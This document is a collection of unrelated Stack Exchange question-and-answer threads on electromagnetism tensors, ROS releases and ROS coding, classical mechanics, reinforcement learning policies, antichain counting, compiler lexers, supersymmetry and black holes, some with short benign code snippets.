Index manipulation in Lorentz scalars
Question: I have been trying to show that: $ \vec{B}^{2} - \vec{E}^{2} =\frac{1}{2} f^{\mu \nu }f_{\mu \nu}$ where $\vec{B}^{2}$ and $\vec{E}^{2}$ are the squared magnitudes of the magnetic and electric fields respectively, and $f^{\mu \nu }$ is the electromagnetic tensor. So far I have tried this: $\vec{B}^{2} - \vec{E}^{2} = \frac{1}{4}(\varepsilon^{ijk}f_{jk} )(\varepsilon_{imn}f ^{mn} )- f^{0l}f_{l0} = \frac{1}{4}(\delta_{m}^{j} \delta_{n}^{k} - \delta_{n}^{j} \delta_{m}^{k})f_{jk}f ^{mn} + f^{l0}f_{l0}$ where I used the following properties $B^{i} = \frac{1}{2}\varepsilon^{ijk}f_{jk}$ $\varepsilon_{imn} \varepsilon^{ijk} = (\delta_{m}^{j} \delta_{n}^{k} - \delta_{n}^{j} \delta_{m}^{k}) $ $f^{\mu \nu }=-f^{\nu \mu }$ then: $=\frac{1}{4}(f_{mn}f^{mn}-f_{nm}f^{mn})+ f^{l0}f_{l0}= \frac{1}{2}f_{mn}f^{mn}+ f^{l0}f_{l0}$ What mistake did I make? Answer: It's not so much that you made a mistake as that you missed the significance of what you found. Note that $$\begin{align}\frac12(f_{\mu\nu}f^{\mu\nu}-f_{mn}f^{mn})&=\frac12(\underbrace{f_{00}f^{00}}_0+f_{0l}f^{0l}+f_{l0}f^{l0}+\underbrace{f_{mn}f^{mn}-f_{mn}f^{mn}}_0)\\&=\frac12(f_{l0}f^{l0}+f_{l0}f^{l0})\\&=f_{l0}f^{l0}.\end{align}$$
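The identity can be sanity-checked numerically. The sketch below assumes the common conventions $F^{0i} = -E^i$, $F^{ij} = -\varepsilon^{ijk}B_k$ and the $(+,-,-,-)$ metric; the field values are arbitrary illustrative numbers.

```python
import math

# Numerical sanity check of f_{mu nu} f^{mu nu} = 2(B^2 - E^2).
E = [1.0, 2.0, 3.0]
B = [0.5, -1.0, 2.0]
eta = [1.0, -1.0, -1.0, -1.0]          # diagonal Minkowski metric

F = [[0.0] * 4 for _ in range(4)]      # F^{mu nu}
for i in range(3):
    F[0][i + 1] = -E[i]
    F[i + 1][0] = E[i]
eps = {(0, 1, 2): 1, (1, 2, 0): 1, (2, 0, 1): 1,
       (0, 2, 1): -1, (2, 1, 0): -1, (1, 0, 2): -1}
for (i, j, k), s in eps.items():
    F[i + 1][j + 1] = -s * B[k]        # F^{ij} = -eps^{ijk} B_k

# For a diagonal metric, F_{mu nu} = eta_mu eta_nu F^{mu nu}, so the full
# contraction collapses to a weighted sum of squares.
contraction = sum(eta[m] * eta[n] * F[m][n] ** 2
                  for m in range(4) for n in range(4))
assert math.isclose(contraction, 2 * (sum(b * b for b in B) - sum(e * e for e in E)))
```

The overall sign convention for $F^{0i}$ does not matter here, since every term enters squared.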
{ "domain": "physics.stackexchange", "id": 86826, "tags": "homework-and-exercises, electromagnetism, tensor-calculus, covariance" }
ros distro "N" version not released?
Question: As it says here http://wiki.ros.org/Distributions a ROS version is expected to be published every May. I know that we have ros2 Dashing Diademata, but if I am not wrong they are independent releases (at least it has a separate distro page (https://index.ros.org/doc/ros2/Releases/)). I just use LTS versions of ros, but I am quite curious. Does anybody know something? Maybe they have decided to remove the non-LTS version to focus more on ros2? Thanks in advance. Originally posted by Solrac3589 on ROS Answers with karma: 187 on 2019-06-07 Post score: 0 Answer: See https://discourse.ros.org/t/planning-future-ros-1-distribution-s/6538 for the plan for Noetic which is targeted for May 2020. Since non-LTS releases have never been used much there is no ROS 1 release in 2019. Edit: the Distributions/ReleasePolicy page has been updated (diff). Originally posted by Dirk Thomas with karma: 16276 on 2019-06-07 This answer was ACCEPTED on the original site Post score: 1 Original comments Comment by gvdhoorn on 2019-06-07: Should the Distributions page not be updated to reflect this? Comment by Dirk Thomas on 2019-06-07: Yes, that would be good. Comment by gvdhoorn on 2019-06-07: Your answer implies you / OR are not going to do that. Is that correct? Comment by Dirk Thomas on 2019-06-07: I will delegate it to the ROS boss of Noetic. So it will get updated. Comment by gvdhoorn on 2019-06-07: "ROS boss" nice one. So it will get updated. Ok, great. It's not that 'others' don't know how to edit a wiki page, but it'd be good to have an authoritative source do that. Just so we don't communicate more incorrect information. Comment by Dirk Thomas on 2019-06-07: "ROS boss" That is more of an internal name than an official title though ;-) Comment by gvdhoorn on 2019-06-07: Hm. So no business cards then ? ;) Comment by Solrac3589 on 2019-06-14: Thanks! :) Comment by gvdhoorn on 2019-06-14: Could you click the checkmark to the left of the answer to mark it as answered?
{ "domain": "robotics.stackexchange", "id": 33141, "tags": "ros, release" }
Lower bound of stable equilibrium for mass on rotating ring
Question: Consider a point mass $m$ constrained to move without friction along a ring of radius $R$. The ring rotates with angular frequency $\omega$ about the $z$-axis which runs through a diameter of the ring, with the origin at the ring's center. There is a uniform gravitational field with acceleration $g$ in the negative $z$-direction. The Lagrangian with a generalized polar coordinate $\theta$ is $$L = \frac{1}{2}mR^2(\dot{\theta}^2+\omega^2 \sin^2\theta)-mgR\cos\theta$$ and the equation of motion $$\ddot{\theta} - \sin\theta\left(\frac{g}{R}+\omega^2\cos\theta\right) = 0$$ The point of stable equilibrium is $\theta=\theta_0$ for $$\cos\theta_0 = \frac{-g}{R\omega^2} \geq -1$$ What does the lower bound $g=R\omega^2 \Rightarrow \theta_0=\pi$ correspond to physically? Answer: $\theta =\pi$ is always the equilibrium point in this problem. If $g> R\omega^2$, then this equilibrium point is stable and there are no other stable equilibrium points. If $g <R\omega^2$, then $\theta = \pi$ is an unstable equilibrium point. So, the physical picture looks like this. If the frequency $\omega$ is not large enough, then the point mass is in the lowest position, otherwise the centrifugal force forces the mass to occupy a higher position. The value $\omega = \sqrt{g/R}$ corresponds to the loss of stability of the equilibrium point $\theta = \pi$.
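The stability claim can be checked numerically from the effective potential $V_{\rm eff}(\theta) = mgR\cos\theta - \tfrac12 mR^2\omega^2\sin^2\theta$, here with the illustrative choice $m = R = 1$:

```python
import math

# Stability at theta = pi is decided by the sign of V_eff'' there,
# estimated here with a central finite difference.
def V(t, g, w):
    return g * math.cos(t) - 0.5 * w ** 2 * math.sin(t) ** 2

def second_deriv(f, t, h=1e-4):
    return (f(t + h) - 2 * f(t) + f(t - h)) / h ** 2

# g > R w^2: theta = pi (the bottom of the ring) is a stable minimum
assert second_deriv(lambda t: V(t, g=9.8, w=1.0), math.pi) > 0
# g < R w^2: theta = pi turns unstable and the mass rides up the ring
assert second_deriv(lambda t: V(t, g=9.8, w=5.0), math.pi) < 0
```

Analytically $V_{\rm eff}''(\pi) = g - \omega^2$ (with $m = R = 1$), which changes sign exactly at $\omega = \sqrt{g/R}$, matching the answer.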
{ "domain": "physics.stackexchange", "id": 97015, "tags": "classical-mechanics, equilibrium" }
Can a policy with gaussian distribution allow two distinct optimal actions to have distinctively high probabilities?
Question: As an example of the benefits of stochastic policies, I have often seen the grid world example below. Five blocks in a row. The first, third, and fifth are white (distinguishable states), and the second and fourth are gray (for the agent, these two states are equivalent and non-distinguishable). Positive reward if the agent goes down in the middle state, negative reward if it goes down in the first and the fifth states. They often say that, in the gray region, it's best to put 0.5 probability on each of the left and right actions, and that this is possible only with stochastic policies. Let Left = 0, Down = 1, and Right = 2 be the action values. Let those three actions, left, down, right, be available in all states, such that the down action in a gray state just makes the agent stay put with a negative reward. My question is, for the gray region, if we use a Gaussian distribution for our policy, can we set up 0.5 probability for each of the left and right actions? Wouldn't it naturally make the probability of choosing the down action quite high, as we only modify the mean and variance? I just find it interesting that most RL papers seem to use a Gaussian distribution for the stochastic policy, but that distribution cannot even solve this simple setup, which is often used in teaching the benefits of stochastic policies. Or am I wrong? Answer: Assuming by distinct you mean that, for example, the Euclidean distance between the two actions is sufficiently large, then no, it cannot be true. This is because the Normal distribution is uni-modal. There is an interesting paper that uses this fact as motivation to replace Normally distributed action selection in on-policy optimisation of MuJoCo tasks with discretised variants since a discrete (e.g. softmax) distribution can be multi-modal. An alternative to discrete actions could be to use a mixture of Gaussians.
This allows the modelling of multiple modes, and in particular, if you have prior information about your action space that tells you how many modes there are likely to be, that goes a long way towards knowing how many Gaussians you'd need in the mixture. An example of this being used, whilst not directly to parameterise the action distribution, is in Distributional RL, where the returns are modelled as a probability distribution. The authors of this paper look to use MoG as an alternative to the commonly used C51 parameterisation (modelling the returns with a discrete distribution of 51 evenly spaced atoms), since C51 typically requires knowing the lower/upper bounds of your returns, whereas a MoG is defined over the whole real line and so doesn't require this prior information. For what it's worth, a Normally distributed policy would not be applicable to the example you have given, since this looks to be an environment with a discrete action space.
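The uni-modality point can be illustrated in a few lines (the action axis and numbers are illustrative): for a single Gaussian with the two good actions at ±1, the density at the "down" region between them can never fall below the smaller of the two target densities, whereas a two-component mixture can dip in the middle.

```python
import math

def normal_pdf(x, mu, sigma):
    return math.exp(-0.5 * ((x - mu) / sigma) ** 2) / (sigma * math.sqrt(2 * math.pi))

# Single Gaussian: whatever mu and sigma are, the density at the midpoint 0
# is at least the smaller of the densities at -1 and +1, because the pdf is
# uni-modal (it rises to mu and then falls).
for mu in (-1.0, -0.5, 0.0, 0.5, 1.0):
    for sigma in (0.1, 0.5, 1.0, 2.0):
        p = lambda x: normal_pdf(x, mu, sigma)
        assert p(0.0) >= min(p(-1.0), p(1.0)) - 1e-12

# A two-component mixture, by contrast, can peak at +-1 and dip at 0:
mix = lambda x: 0.5 * normal_pdf(x, -1.0, 0.2) + 0.5 * normal_pdf(x, 1.0, 0.2)
assert mix(0.0) < mix(-1.0) and mix(0.0) < mix(1.0)
```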
{ "domain": "ai.stackexchange", "id": 4207, "tags": "reinforcement-learning, stochastic-policy" }
Are there Windows Compatible ROS nodes?
Question: I am trying to write a program in Windows that is able to send packets to a ROS node. It does not necessarily have to be a Windows node, just a program that runs on a Windows machine and can send ROS (linux) -compatible packets for another computer running Linux to handle/receive those packets via a ROS node. Does roscore (the 'Master' node) influence this in any way? Originally posted by doullylogo on ROS Answers with karma: 38 on 2016-07-25 Post score: 0 Answer: Publishing and subscribing to ROS topics is not just a matter of sending properly-formatted packets. Your program also needs to communicate with the ROS master to advertise its topic, and it needs to negotiate the topic setup when other ROS nodes want to subscribe to that topic. The technical overview goes through the details of topic setup if you're interested. Instead of running a full publisher on your windows machine, you can run a ROS node which bridges a simpler transport mechanism into ROS. Two of the more popular approaches for this are: Encode your messages as JSON and communicate over a websocket to rosbridge. (easy) Use rosserial_windows to tunnel messages over TCP to the rosserial_server. (better performance) Originally posted by ahendrix with karma: 47576 on 2016-07-25 This answer was ACCEPTED on the original site Post score: 1 Original comments Comment by sdcguy on 2018-02-28: Hi I have been trying to do this Using JSON over rosbridge, But haven't been able to figure it out. I tried to just create a Python script on Windows and connect to the port that rosbridge is running on and listen for JSON queries. And it just didn't work. Is this the right approach or not? Comment by ahendrix on 2018-03-01: This question has already been answered. If you're having a specific problem, please ask a new question and include a description of your network, your code, a description of what you expect it to do and a description of what it actually does.
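For the rosbridge route mentioned in the answer, the wire format is JSON text frames following the rosbridge protocol: the Windows-side program first advertises the topic, then publishes to it. A minimal sketch (the topic name and payload are hypothetical, and the actual websocket send, typically to ws://&lt;ros-machine&gt;:9090, is omitted):

```python
import json

# Hypothetical rosbridge frames: "advertise" registers the topic with the
# ROS master via rosbridge, "publish" then carries the message payload.
advertise = {"op": "advertise", "topic": "/from_windows", "type": "std_msgs/String"}
publish = {"op": "publish", "topic": "/from_windows", "msg": {"data": "hello from Windows"}}

frames = [json.dumps(advertise), json.dumps(publish)]
for frame in frames:
    print(frame)   # each frame would go out as one websocket text message
```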
{ "domain": "robotics.stackexchange", "id": 25350, "tags": "ros, nodes" }
Is it possible to use a balloon to float so high in the atmosphere that you can be gravitationally pulled towards a satellite?
Question: A recent joke on the comedy panel show 8 out of 10 cats prompted this question. I'm pretty sure the answer's no, but hopefully someone can surprise me. If you put a person in a balloon, such that the balloon ascended to the upper levels of the atmosphere, is it theoretically possible that an orbiting satellite's (i.e. a moon's) gravity would become strong enough to start pulling you towards it, taking over as the lifting force from your buoyancy? Clearly this wouldn't work on Earth, as there's no atmosphere between the Earth and the moon, but would it be possible for a satellite to share an atmosphere with its planet such that this would be a possibility, or would any shared atmosphere cause too much drag to allow for the existence of any satellite? If it were possible, would it also be possible to take a balloon up to the satellite's surface, or would the moon's gravity ensure that its atmosphere was too dense near the surface for a landing to be possible, thus leaving the balloonist suspended in equilibrium? Could you jump up from the balloon towards the moon (i.e. jumping away from the balloon in order to lose the buoyancy it provided)? http://www.channel4.com/programmes/8-out-of-10-cats/4od#3430968 Answer: No, a shared atmosphere between a body and its moon is not possible. For a natural satellite to remain, the orbit must be very stable, because those satellites exist for billions of years. Even the tiniest bit of atmosphere (a few molecules) would cause a tiny drag. However, drag adds up, so over a long time period even a heavy object (such as the moon) would spiral down and ultimately collide with the body it is orbiting. A balloon needs quite a significant atmosphere to work. Present balloons can reach up to 30–35 km altitude. Since atmospheric density (in the heterosphere) drops off exponentially with elevation, balloons would have to get gigantic to reach even a little bit higher.
Reaching an elevation where the atmosphere has negligible density is, in a balloon, impossible. One can, however, in theory try to go as high as possible with a balloon, and then use other methods (such as rockets) from there, thus bypassing the densest part of the atmosphere and saving a lot of fuel. Edit: one more way to look at it: if a satellite had enough gravitational pull to pull up an observer in a balloon, it would certainly pull up the atmosphere; therefore the satellite would be in the atmosphere, which is impossible. Therefore, a satellite can never have enough gravitational pull to pull up an observer inside the atmosphere.
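For the Earth-Moon case specifically, a back-of-the-envelope comparison shows just how far a balloonist is from being "pulled up" (constants are approximate, for illustration only):

```python
G = 6.674e-11        # gravitational constant, m^3 kg^-1 s^-2
M_moon = 7.35e22     # kg
M_earth = 5.97e24    # kg
d_moon = 3.84e8      # m, mean Earth-Moon distance (35 km of altitude is negligible)
r = 6.371e6 + 35e3   # m, Earth's radius plus balloon altitude

a_moon = G * M_moon / d_moon ** 2    # the Moon's pull, roughly 3e-5 m/s^2
a_earth = G * M_earth / r ** 2       # Earth's pull, roughly 9.7 m/s^2
print(f"Earth's pull exceeds the Moon's by a factor of about {a_earth / a_moon:.0f}")
```

Earth wins by several hundred thousand times, so buoyancy never has to compete with the Moon at balloon altitudes.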
{ "domain": "physics.stackexchange", "id": 5196, "tags": "forces, newtonian-gravity, atmospheric-science, earth" }
Reading a yes/no answer from std::cin
Question: Based on this question, I wrote my own implementation of the yesno function I suggested. The function reads an answer until it is either "y" or "yes" or "n" or "no" (case-insensitive). #include <algorithm> #include <cctype> #include <cstdlib> #include <iostream> #include <string> bool yesno(const std::string &prompt) { while (true) { std::cout << prompt << " [y/n] "; std::string line; if (!std::getline(std::cin, line)) { std::cerr << "\n"; std::cerr << "error: unexpected end of file\n"; std::exit(EXIT_FAILURE); } std::transform(line.begin(), line.end(), line.begin(), [](unsigned char x){return std::tolower(x);}); if (line == "y" || line == "yes") { return true; } if (line == "n" || line == "no") { return false; } } } int main() { bool include_digits = yesno("Should the password include digits?"); if (include_digits) { std::cout << "le1mein\n"; } else { std::cout << "letmein\n"; } } I took care to: Include all necessary headers. Call the std::tolower function with an unsigned char as argument. Use std::getline instead of the hard-to-control >> operator. Catch all errors (except for writing to std::cout). Anything that I missed? Answer: Good job in general, mad props for proper use of cout vs cerr. I don't see any "errors" per se, but I do see a few things I personally would have done a bit differently. Opinion: Not a big fan of std::exit() in anything but main() A function is supposed to be decontextualized, and having a "will crash the whole program if it fails" as part of the function's contract is just too aggressive in my opinion. Personally, I'd rather just throw an exception instead. It accomplishes the same thing, and it lets users of the function choose how to handle failures. Opinion: maybe have a separate prompt for failure? I would personally explain to the user why he is being asked the same question twice when the input fails to match either criteria. 
Opinion: std::transform is overkill here This is a personal bias, as I find in-place usage of std::transform uncomfortable at best, since a range-based for does as good a job in a much more legible manner. Specifically: Having to read the third parameter to understand that it's an in-place transform is just unnecessary cognitive load. I find the following easier to parse: for(auto& x : line) { x = std::tolower(static_cast<unsigned char>(x)); }
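Putting the suggestions together, here is a sketch of what the revised function could look like. Taking the streams as parameters is my addition (not in the original review), which also makes the function unit-testable; the exception on EOF and the separate re-prompt follow the first two opinions above.

```cpp
#include <cctype>
#include <iostream>
#include <sstream>
#include <stdexcept>
#include <string>

// Exception-based variant: EOF throws instead of exiting the program, a
// non-matching answer gets its own explanatory re-prompt, and lowercasing
// uses a range-based for.
bool yesno(std::istream& in, std::ostream& out, const std::string& prompt) {
    while (true) {
        out << prompt << " [y/n] ";
        std::string line;
        if (!std::getline(in, line)) {
            throw std::runtime_error("unexpected end of file");
        }
        for (auto& c : line) {
            c = static_cast<char>(std::tolower(static_cast<unsigned char>(c)));
        }
        if (line == "y" || line == "yes") return true;
        if (line == "n" || line == "no") return false;
        out << "Please answer yes or no.\n";
    }
}
```

A caller would pass std::cin and std::cout and decide for itself whether an EOF is fatal.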
{ "domain": "codereview.stackexchange", "id": 28339, "tags": "c++" }
How are lexical tokens produced
Question: I am studying Compiler Design. The instructor told us that when a program is given to the lexical analyzer it finds all tokens, then a symbol table is created and updated at every phase accordingly, but I read these online notes and here is the statement: The lexical analyzer produces a single token each time it is called by the parser. I can't understand this statement. How does all this happen? For a program with thousands of lines of code there may be thousands of tokens, and if the parser calls the lexical analyzer for every token, isn't this very time-consuming? How does the parser decide that all tokens have been produced and it doesn't need to call the lexical analyzer anymore? I am asking about compilers in general, not a specific language. Answer: Yes, normally a parser calls the lexical analyser every time it needs a token, and this results in many, many, many calls to the lexical analyser. It is well known by compiler writers that the lexical analysis can consume the larger proportion of the compiler's execution time. However, the lexical analysis process would normally use a Chomsky type 3 grammar, or a regular language, and thus can be implemented by a finite state automaton, which can be coded quite efficiently. The parser, by contrast, will normally be based on some form of Chomsky type 2 (context-free) grammar and the algorithm would be less efficient as it may involve back-tracking or rule matching. Thus devolving some work from the less efficient parser to the more efficient lexical analyser makes the whole compiler more efficient. It is possible also to implement the relationship between the lexical analyser and the parser in a different way. The lexical analyser could process the whole input source program from a file (of text) into a complete set of tokens, which could themselves be stored in a file. Then the parser could input that file of tokens. This would be slower because it involves the writing and reading of a file.
The list of tokens could alternatively be stored in memory, but then the compiler has a larger memory requirement. Historically, on early computers with smaller memories and slower processors, it was done in a similar way: perhaps the input (tape) of the source program resulted in an output (tape) of tokens, which became the input (tape) of the parser program! On a modern system this could be implemented in a pipe, for example: lexer sourcefile.lng | parser | optimiser | codegen > program.exe Internally, some compilers could implement it this way, but normally a parser (function) within the compiler calls a lexer (function) as described.
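The pull model described in the answer can be sketched in a few lines: the parser repeatedly asks for the next token, and the lexer is a simple finite-state scanner over the input. The toy token set (NUM, OP, EOF) and grammar are illustrative, not from any particular compiler.

```python
def tokens(src):
    """Yield (kind, text) pairs one at a time, as a parser would pull them."""
    i = 0
    while i < len(src):
        c = src[i]
        if c.isspace():
            i += 1                      # skip whitespace between tokens
        elif c.isdigit():
            j = i
            while j < len(src) and src[j].isdigit():
                j += 1                  # longest-match rule for numbers
            yield ("NUM", src[i:j])
            i = j
        elif c in "+-*/()":
            yield ("OP", c)
            i += 1
        else:
            raise SyntaxError(f"unexpected character {c!r}")
    yield ("EOF", "")                   # sentinel: tells the parser to stop

toks = list(tokens("12 + 34"))   # [("NUM","12"), ("OP","+"), ("NUM","34"), ("EOF","")]
```

The EOF sentinel answers the question of how the parser knows when to stop calling the lexer: the lexer reports end-of-input as just another token.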
{ "domain": "cs.stackexchange", "id": 18670, "tags": "compilers, parsers, lexical-analysis" }
State counting in the d = 1+2, $\cal{N} = 2$ vector multiplet
Question: The question is from Box 8.2, page 282 of the book "Gauge Gravity Duality" by Ammon and Erdmenger. The link to the specific page from Google Books is here. According to the authors, a $\mathcal{N} = 2$ vector superfield includes a vector potential $A_\mu$, a real scalar field $\sigma$, two real (Majorana) gauginos, and an auxiliary real scalar field $D$, all in the adjoint representation of the gauge group. I am not sure how the counting works: Vector potential $A_\mu$ has $(3-2) = 1$ (bosonic) degree of freedom, as a gauge field in $d = 1 + 2$ dimensions. A real scalar field has $1$ (bosonic) degree of freedom. Two real Majorana gauginos have $2 \times 2^{(3-1)/2}$ (real) fermionic degrees of freedom, i.e. $4$ fermionic degrees of freedom. An auxiliary real field has $1$ bosonic degree of freedom. The number of fermionic and bosonic components do not match. Answer: You are performing an on-shell counting for an off-shell multiplet. The off-shell vector multiplet has $\sigma [1], A_{\mu} [2], D[1], \lambda [4]$ thus $4+4$ degrees of freedom. The on-shell vector multiplet consists of the scalar $\sigma$, the vector $A_\mu$ and the Dirac fermion $\lambda$. In that case, the counting is $\sigma [1], A_{\mu} [1], \lambda [2]$ so you have $2+2$ degrees of freedom.
{ "domain": "physics.stackexchange", "id": 27922, "tags": "supersymmetry, field-theory, degrees-of-freedom, superspace-formalism" }
My exact divide-conquer algorithm for counting antichain in a poset?
Question: This post is a little lengthy, thank you for your patience in reading. ^_^ As is known, counting antichains in a poset is #P-complete, so it is NP-hard to get the exact answer. The following is my simple divide-and-conquer algorithm for the antichain counting problem (#ANTICHAIN). I wonder whether more helpful properties relevant to my algorithm could be found, and whether the worst case can actually happen. We represent the poset as a DAG. Notice: We can assume that $G$'s underlying undirected graph is connected. Otherwise, we can count each connected component separately and just multiply the counts of the components. Also, we assume that $G$ is the transitive reduction of itself, i.e., $G$ is free of transitive edges. Consider a vertex $u$ of $G$, let $R^+[u]=\{ v | u \leadsto v \}$ denote the set of vertices which are reachable from $u$, including $u$ itself. Similarly, let $R^-[u]=\{ v | v \leadsto u \}$. When $u$ is selected as a member of an antichain, $R^+[u]$ is excluded from further selection, i.e., $G \leftarrow G-R^+[u]$. Just delete $R^+[u]$ and any edge which has a head (end-point) in $R^+[u]$ from $G$. When $u$ is not selected, $R^-[u]$ is excluded from further selection, i.e., $G \leftarrow G-R^-[u]$. Just delete $R^-[u]$ and any edge which has a tail (start-point) in $R^-[u]$ from $G$. Let $|R^+[u]|=a$ and $|R^-[u]|=b$, then the recurrence relation is at least as good as $$T(n)=T(a)+T(n-a)+T(b)+T(n-b) \text.$$ Why at least? Because the underlying undirected graph of $G-R^+[u]$ or $G-R^-[u]$ may be disconnected. For a DAG, let ${\Delta^-}(G)$ and ${\Delta^+ }(G) $ represent the maximum indegree and outdegree of vertices of $G$. If ${\Delta ^ - }(G) \le 1$ and ${\Delta ^ + }(G) \le 1$ , then #ANTICHAIN is in $\mathcal{O}(n)$. Otherwise, my algorithm satisfies the recursion $$T(n)=T(n-1)+T(n-3) \text,$$ nearly $\mathcal{O}(1.45^n)$. I wonder whether the recursion is tight?
Does there exist a DAG for which, using my simple divide-and-conquer algorithm, the running time is $T(n)=T(n-1)+T(n-3)$? This algorithm is really kind of stupid. Do more elegant, efficient algorithms already exist? Has anyone thought about a possible FPRAS for it? Or has anyone proved that #ANTICHAIN does not have an FPRAS? Wow, closed. Sincerely thanks for your answers/comments in advance. ^_^ Answer: Counting antichains in an $n$ element poset is equivalent to counting independent sets in a comparability graph on $n$ vertices. The problem of counting the independent sets in an $n$ vertex graph has an $O(1.2461^n)$ time algorithm, see Fürer and Kasiviswanathan http://eccc.hpi-web.de/report/2005/033/ .
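For reference, here is a small brute-force sketch of exact antichain counting by branching on a vertex $u$. Note it uses the textbook rule "if $u$ is selected, drop everything comparable to $u$; if not, just drop $u$", which differs from the $R^-[u]$ rule in the post; it is meant only to make the counting concrete, not to reproduce the poster's exact recursion.

```python
from functools import lru_cache

def count_antichains(vertices, reach):
    """reach[u] = frozenset of vertices reachable from u (excluding u)."""
    @lru_cache(maxsize=None)
    def go(remaining):
        if not remaining:
            return 1                     # only the empty antichain
        u = min(remaining)
        rest = remaining - {u}
        excl = go(rest)                  # branch 1: u not in the antichain
        comparable = frozenset(v for v in rest if v in reach[u] or u in reach[v])
        incl = go(rest - comparable)     # branch 2: u in, comparables out
        return excl + incl
    return go(frozenset(vertices))

# A 3-element chain a < b < c has exactly the 4 antichains {}, {a}, {b}, {c}:
chain = {"a": frozenset("bc"), "b": frozenset("c"), "c": frozenset()}
assert count_antichains("abc", chain) == 4
```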
{ "domain": "cstheory.stackexchange", "id": 1027, "tags": "cc.complexity-theory, ds.algorithms, graph-theory, co.combinatorics, partial-order" }
What is the difference between a complex scalar field and two real scalar fields?
Question: Consider a complex scalar field $\phi$ with the Lagrangian: $$L = \partial_\mu\phi^\dagger\partial^\mu\phi - m^2 \phi^\dagger\phi.$$ Consider also two real scalar fields $\phi_1$ and $\phi_2$ with the Lagrangian: $$L = \frac12\partial_\mu\phi_1\partial^\mu\phi_1 - \frac12m^2 \phi_1^2 +\frac12\partial_\mu\phi_2\partial^\mu\phi_2 - \frac12m^2 \phi_2^2.$$ Are these two systems essentially the same? If not -- what is the difference? Answer: There are some kind of silly answers here, except for QGR who correctly says they are identical. The two Lagrangians are isomorphic, the fields have just been relabeled. So anything you can do with one you can do with the other. The first has manifest $U(1)$ global symmetry, the second manifest $SO(2)$ but these two Lie algebras are isomorphic. If you want to gauge either global symmetry you can do it in the obvious way. You can use a complex scalar to represent a single charged field, but you could also use it to represent two real neutral fields. If you don't couple to some other fields in a way that allows you to measure the charge there is no difference.
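The isomorphism the answer refers to can be made explicit with the substitution $\phi = (\phi_1 + i\phi_2)/\sqrt{2}$, under which the complex-field Lagrangian reproduces the two-real-field one term by term:

```latex
\phi = \frac{1}{\sqrt{2}}\left(\phi_1 + i\phi_2\right)
\;\Longrightarrow\;
\phi^\dagger\phi = \frac{1}{2}\left(\phi_1^2 + \phi_2^2\right),
\qquad
\partial_\mu\phi^\dagger\,\partial^\mu\phi
  = \frac{1}{2}\,\partial_\mu\phi_1\,\partial^\mu\phi_1
  + \frac{1}{2}\,\partial_\mu\phi_2\,\partial^\mu\phi_2 .
```

In these variables the $U(1)$ phase rotation $\phi \to e^{i\alpha}\phi$ is exactly the $SO(2)$ rotation of the doublet $(\phi_1, \phi_2)$.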
{ "domain": "physics.stackexchange", "id": 63156, "tags": "quantum-field-theory, lagrangian-formalism, field-theory, complex-numbers" }
Where do black holes go?
Question: According to many physicists, any matter near a black hole is obviously gravitated towards it, and transported to a parallel universe. As far as I know, black holes are made up of material particles, as is everything else in the universe, so why aren't they sucked into the parallel universe? And if it is true that it sucks up everything and transports it to a parallel universe, shouldn't it be bright in that parallel universe, as light is also pulled into it? If so, why doesn't our universe have these? Answer: It's a common claim that certain types of black holes provide a gateway to a parallel universe, however there are three problems with this claim. Firstly, although it's true that trajectories can be traced through the event horizon and back out again, it isn't clear whether this is physically meaningful or just a mathematical trick. In fact if recent suggestions about firewalls are correct anything crossing the event horizon will simply be incinerated. Secondly, even if the trajectories are physically meaningful and firewalls don't get in the way, the universe you reach is not a parallel universe but just a causally disconnected bit of the same universe you and I live in. Lastly, even if you can travel through the black hole to reach a causally disconnected bit of the universe, for any observer outside the black hole the trip will take an infinite time. So we could only see something emerge from a black hole if the black hole were infinitely old. Clearly this isn't the case. You might be interested to have a look at my answer to Entering a black hole, jumping into another universe---with questions where I go into more detail about the travel through a black hole. Also in that answer I mention the book The Cosmic Frontiers of General Relativity by William J. Kaufmann and this book deals with your question.
From outside the event horizon you can't see anything travelling out of the black hole, but if you jump into the black hole then in principle once inside the event horizon you could see light coming from other parts of the universe, or from parallel universes if you wish to describe them so.
{ "domain": "physics.stackexchange", "id": 6529, "tags": "black-holes, quantum-teleportation, multiverse, white-holes" }
Cannot convert ros::Subscriber to float
Question: Hello, I have the problem: error: cannot convert ros::Subscriber to float in assignment I used 2 subscribers to listen to my velocities and I want to get the values as floats, but it doesn't work. #include "ros/ros.h" #include "std_msgs/Float64.h" #include <can_msgs/Frame.h> #include <socketcan_bridge/topic_to_socketcan.h> #include <socketcan_interface/socketcan.h> class VehicleDynamics { public: VehicleDynamics() { sub_vel_left= n.subscribe<std_msgs::Float64>("left_velocity_controller/command",1, &VehicleDynamics::velCallback, this); sub_vel_right= n.subscribe<std_msgs::Float64>("right_velocity_controller/command",1, &VehicleDynamics::velCallback, this); pub_ = n.advertise<can_msgs::Frame>("sent_messages", 10); } float calculate() { static const float calcReduc = m_reduc * 16.6666666f; static const float calcDiameter = (m_diameter * M_PI) / 1000.0f; velocity_rpm = ((left_wheel+right_wheel)/ 2); return (velocity_rpm* calcDiameter/calcReduc); } void velCallback(const std_msgs::Float64::ConstPtr& float_msgs) { n.getParam("MobileResearchPlattform/motor/nominal_speed",m_max_velocity); n.getParam("MobileResearchPlattform/geometry/wheel_diameter",m_diameter); n.getParam("/MobileResearchPlattform/motor/reduction",m_reduc); left_wheel=sub_vel_left; right_wheel=sub_vel_right; velocity_kmh = calculate(); can_msgs::Frame msg; msg.is_extended = false; msg.is_rtr = false; msg.is_error = false; msg.id = 0x220; msg.dlc = 8; msg.data[1] = velocity_kmh; msg.header.frame_id = "0"; // "0" for no frame. msg.header.stamp = ros::Time::now(); // send the can_frame::Frame message to the sent_messages topic.
pub_.publish(msg); } private: ros::NodeHandle n; ros::Publisher pub_; ros::Subscriber sub_vel_left; ros::Subscriber sub_vel_right; float velocity_rpm; float velocity_kmh; float left_wheel; float right_wheel; float m_max_velocity; float m_diameter; int m_reduc; }; int main(int argc, char **argv) { ros::init(argc,argv,"VehilceDyn"); VehicleDynamics SAPObject; ros::Rate loop_rate(10000); ros::spin(); return 0; } Originally posted by Milliau on ROS Answers with karma: 33 on 2017-01-24 Post score: 0 Answer: The subscriber is a subscriber and not a float value. You can find the float value in the msg you receive. In your case, you need two callback functions in which you can access your float as float_msgs->data. So create two callbacks (leftVelCb, rightVelCb) and read the corresponding msg. Originally posted by NEngelhard with karma: 3519 on 2017-01-24 This answer was ACCEPTED on the original site Post score: 0 Original comments Comment by Milliau on 2017-01-24: Ok, so I have to make a function like this: void velLeftCallback(const std_msgs::Float64::ConstPtr& float_msgs) { float_msgs->data; } Is that right? And where can I define which variable the data is written to? Comment by NEngelhard on 2017-01-24: just assign it: float left_vel = float_msgs->data;
